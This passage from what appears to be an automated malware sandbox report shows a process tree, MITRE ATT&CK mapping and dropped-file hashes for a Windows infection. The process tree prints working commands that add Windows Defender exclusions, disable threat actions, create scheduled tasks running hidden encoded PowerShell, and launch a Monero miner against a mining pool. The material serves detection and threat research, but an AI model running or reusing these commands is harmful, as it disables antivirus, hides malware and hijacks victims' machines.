\"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:4972
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5388
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5440
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gSMoQsjQX" /SC once /ST 07:14:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:2028
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gSMoQsjQX"
  2⤵
  PID:2184
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gSMoQsjQX"
  2⤵
  PID:6220
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 09:10:19 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\wpQiTDD.exe\" GH /quSJdidIz 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:212
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:5140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6224

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:5460
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:6332

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:3004
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:5264
- - C:\Windows\Temp\695296.exe
    "C:\Windows\Temp\695296.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
    3⤵
    PID:7116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5864
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:6232

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
PID:4940

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
PID:5164

C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
1⤵
PID:6212

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:7048

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:1044

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\wpQiTDD.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\wpQiTDD.exe GH /quSJdidIz 385118 /S
1⤵
PID:5636
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:2576
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:6060
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6328
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:6396
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5052
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:3404
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:4272
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:3192
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:6204
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6252
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:3548
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:1036
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2436
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:4540
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:1800
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5136

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\1000021002\da6b67b1f6.exe

Filesize
1.1MB

MD5
e5ac1cd3611039e9a9fdcd1b0e867ccb

SHA1
345a4c6d7130d010ec5cedde5da8ed7c36901a86

SHA256
a2f9493f5620c1a5d4fdb2f6a9445fbeac8c908b031112cd63d864a54ac4d17d

SHA512
06972592bd26951c1850269ac3039099c3dcc5e8a9291daed72030e7fa96ea4a3d19b249674b96bf6ff48f3d7ce00cf2d2c0c25be9c71862aa26baca7021092c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
f5a4756fa1b05d185feaeae52974f3ed

SHA1
25b0d63b578bfa81a8a2f8143b35a09e28ad517e

SHA256
951b4d3c42b0602a4f04fd27c6464559d3a979feda19001e7e4b093e70ff3356

SHA512
bf10023b5aaf19ffb819c49d38a5d231bbc0ec3ac9b77b589f1731840f4ad5b99efda067dbff2a79c3d20807d0a3f40736db7b9b5b393592e4f732bf46398308

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
8c0a4c26c00321ea8a876ddd24c8fb96

SHA1
c2c61d2b0793170ab9befead986a47be6d54e7c3

SHA256
9ff43d48df87900042613b13fe647ada1c147a5c3fcd7ea7ce06a9123cf555ce

SHA512
aa38af772b8b35a743d2faae6f21391edf9e55af1c60b58a1e8c94e5ce58228abf83967705c9d174371a2a490d257a5881807aac7f988cb4de153c4cffb198ac

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
6731b40b85f96c08e5c7ade88a0f001c

SHA1
541d8d470de228a94fae6a8ca659a70adc1707ac

SHA256
e20b43104bf4017bb72e2fbf18ce551bf660712983c3d0672697bcc50465d6e1

SHA512
af50ad780fe004e4c0585de798aa783e6e93e628aff0f614abf269b65c4338dca9b67b9266f187211811d1964073a33fa380e16d2a62e1fd3ee467fdafc10e50

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
585f3495d26be90a7811415d329882f3

SHA1
86167ee1da57811ce08a48b0e50cab2718d27890

SHA256
144aa049658ef9dd35abbae027948650c4b0488a65533dac844a0d346216c53f

SHA512
458971918212eeae899d6f7124b9a907faa7cfbe031d4d1bbf62fd203800505f129fffee8cb2f83872daf69d1d8e5d5b4815462cb7bd041b4688c2baf51a2bba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
78KB

MD5
ac64fbfba8058a1f2c8e7f56add086a7

SHA1
ad5e206a10d7daccd7f5dfa8be2ac6886072ef82

SHA256
a57727740dbc64d2a0bda8fc3677be8710fa220d4302506fdeaf90f5de715333

SHA512
d88df2a6710c55148f3006621bedb18d28d068aeb34dbf72cd8dfcda602ed29c2c9111c5b87edbee642836789dea3d3e93cd9cc3420c98dc6ffb06132f025bf4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1d7f3d1036cc09d2b9c5d8d5acfbb867

SHA1
5a76ade3e2ced7d72b6ce450b074d3c5aaa13b85

SHA256
0725190ee120338da973024f3d633bd17d0009af194000fa0a91dde961a8d76c

SHA512
dc993da2058b91cd4870b0e868963cadd68d0c03aee091691d7ed0a027215ef5114c9d56ec8d9e228cd7d022339d277903fc12481e2e00df758a3915a17d1fd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
21KB

MD5
d8cec714f67923944387fe769ea15c04

SHA1
f57cb98a29632aa909d3b630bd11235234b12e22

SHA256
631f30a918dfefceadb058d451058d58a2fcf64c8478ad402352527e921f98b9

SHA512
d076f27ef3926e0dee73330d087689ad89dced592c30c76e9a8a26c9d13c4b3042f0a47e5152df09dcd3a542b41c94c8ee80dcc5347004c177c8ff7daa8b63ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe

Filesize
1.8MB

MD5
9ae4ed73ec522dc59e04c071d05be9c2

SHA1
64da4eb748a39bd4f61f345ff4bd8d092058ab8b

SHA256
98f1ef77ff1f6f29a6d96ad9db17fae7f16403c37f9bd9123e3074c5eadbceab

SHA512
33a8354b3300ed7a7e51484ac99b506bd972eb461fd96e696bd292a70d3437e64ce1c82c759865e3eb16d10fbcad13607c52b152552df5be09579841b5af4bb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000020001\bcd327bbad.exe

Filesize
2.2MB

MD5
052683558e91c5ec87ec394517b533aa

SHA1
746749667ec5182ecaf9586b14048b5b0ba695be

SHA256
714b8066b0ed6d049d5b2f034d0a602885214101c8f51746f0e745c0493d70dc

SHA512
2e73587f3a58a8adce6a3ff5f18a6bf02fe9ba8ed00615cdc4c138ef65ad3445c227303d4e6b99a0b578eec6e0716e9b4d8bb0e4287254f7a4136b58f0932811

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe

Filesize
321KB

MD5
1c7d0f34bb1d85b5d2c01367cc8f62ef

SHA1
33aedadb5361f1646cffd68791d72ba5f1424114

SHA256
e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c

SHA512
53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe

Filesize
304KB

MD5
8510bcf5bc264c70180abe78298e4d5b

SHA1
2c3a2a85d129b0d750ed146d1d4e4d6274623e28

SHA256
096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6

SHA512
5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe

Filesize
158KB

MD5
317465164f61fe462864a65b732ccc13

SHA1
5b78c41ad423766e9aadae91f902d14a922c8666

SHA256
95674cb006bfca36cd0e0f9b80ef0ed240c64f2ee955d9dd4af8102a0c4d9806

SHA512
9bc4846a92b7b25e973b42c2cd4895dd15132d0fa1d9ee62e8d7e3679e8bb3b75ae9fb5c6fa165af0f77eaf3e3f75a4d7f60057a0cb22693fc80d89390d09046

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe

Filesize
389KB

MD5
d6078bbecc15a333c6171debc4488498

SHA1
ca57a639ec0fc1a6489b69278478c5845a4c046b

SHA256
8ddb2ac7260e57b2f20a55e30eb1b41595f38bf484b0a94e9495f3107c3bb913

SHA512
912f67baa141bb846a12568c94d5dfbd6d6cdefe0a036a9249accd83e9ee460bc8863758c8bd5cdac7a0af3f481194b57ef414378ebb400967579ba6d736469e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe

Filesize
564KB

MD5
f15a9cfa3726845017a7f91abe0a14f7

SHA1
5540ae40231fe4bf97e59540033b679dda22f134

SHA256
2dec75328413d4c278c119db42920fb183a88a5398d56ecc80c8cc74fba13071

SHA512
1c2af9608736ad6a02d093f769fe5ec5a06cb395a639e021d4ee3f6c46cebc8c101e7db1064984f801ad3bee65d81b95fe6e2e60c0ec949bb172ba9c455b9869

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe

Filesize
2.7MB

MD5
31841361be1f3dc6c2ce7756b490bf0f

SHA1
ff2506641a401ac999f5870769f50b7326f7e4eb

SHA256
222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

SHA512
53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe

Filesize
4.2MB

MD5
0f52e5e68fe33694d488bfe7a1a71529

SHA1
11d7005bd72cb3fd46f24917bf3fc5f3203f361f

SHA256
efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8

SHA512
238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe

Filesize
418KB

MD5
0099a99f5ffb3c3ae78af0084136fab3

SHA1
0205a065728a9ec1133e8a372b1e3864df776e8c

SHA256
919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

SHA512
5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

Filesize
1.7MB

MD5
6bcab686349807f131a92c8fe7a4d736

SHA1
487846c6d51f8df894bb174542a81fd0eb25e1ae

SHA256
ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926

SHA512
94e16b6336a1205cf624f8fcdbb2e32a2e85be93a483d87369e3cd85b12a31f31a908c730709f40a91d0ae6a173554c66229bb44d4ac2295c29073741ce9014a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS716D.tmp\Install.exe

Filesize
6.4MB

MD5
220a02a940078153b4063f42f206087b

SHA1
02fc647d857573a253a1ab796d162244eb179315

SHA256
7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60

SHA512
42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa

Download Submit
